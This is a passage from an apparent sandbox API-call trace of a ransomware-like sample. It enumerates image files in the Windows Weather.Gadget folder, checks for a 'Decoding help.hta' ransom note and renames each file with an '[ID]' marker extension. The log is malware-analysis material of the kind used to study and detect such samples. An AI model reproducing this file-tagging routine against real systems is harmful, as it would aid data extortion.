lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.438] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.438] lstrcmpiW (lpString1="Decoding help.hta", lpString2="17.png") returned 1 [0059.438] lstrlenW (lpString="17.png") returned 6 [0059.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.439] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.439] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="17.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png" [0059.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png" [0059.439] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.439] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\17.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\17.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\17.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.442] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0cb98d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0cb98d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1c0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="18.png", cAlternateFileName="")) returned 1 [0059.442] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.442] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.442] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.442] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.442] lstrcmpiW (lpString1="Decoding help.hta", lpString2="18.png") returned 1 [0059.442] lstrlenW (lpString="18.png") returned 6 [0059.442] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.442] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.442] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="18.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png" [0059.442] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png" [0059.443] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\18.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\18.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\18.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.443] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0f1aec, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0f1aec, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="19.png", cAlternateFileName="")) returned 1 [0059.443] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.443] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.443] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.443] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.444] lstrcmpiW (lpString1="Decoding help.hta", lpString2="19.png") returned 1 [0059.444] lstrlenW (lpString="19.png") returned 6 [0059.444] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.444] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.444] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="19.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png" [0059.444] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png" [0059.444] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.444] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\19.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\19.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.444] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0f1aec, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc0f1aec, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="1px.gif", cAlternateFileName="")) returned 1 [0059.445] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.445] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.445] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.445] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.445] lstrcmpiW (lpString1="Decoding help.hta", lpString2="1px.gif") returned 1 [0059.445] lstrlenW (lpString="1px.gif") returned 7 [0059.445] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.445] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.445] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="1px.gif" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif" [0059.445] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif" [0059.445] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif.[ID]g9uZrLhJaygpwRm1[ID]" [0059.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1px.gif"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1px.gif.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\1px.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.446] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc117c4b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc117c4b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1456, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.png", cAlternateFileName="")) returned 1 [0059.446] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.446] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.446] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.446] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.446] lstrcmpiW (lpString1="Decoding help.hta", lpString2="2.png") returned 1 [0059.446] lstrlenW (lpString="2.png") returned 5 [0059.446] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.446] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.446] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="2.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png" [0059.446] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png" [0059.446] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\2.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\2.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\2.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.446] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="20.png", cAlternateFileName="")) returned 1 [0059.446] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.446] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.446] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.446] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.447] lstrcmpiW (lpString1="Decoding help.hta", lpString2="20.png") returned 1 [0059.447] lstrlenW (lpString="20.png") returned 6 [0059.447] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.447] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.447] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="20.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png" [0059.447] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png" [0059.447] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.447] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\20.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\20.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\20.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.447] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc13ddaa, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc13ddaa, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd70bf7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x17b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="21.png", cAlternateFileName="")) returned 1 [0059.447] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.447] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.447] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0059.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0059.447] lstrcmpiW (lpString1="Decoding help.hta", lpString2="21.png") returned 1 [0059.447] lstrlenW (lpString="21.png") returned 6 [0059.447] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0059.447] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0059.447] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="21.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png" [0059.447] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png" [0059.447] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\21.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows 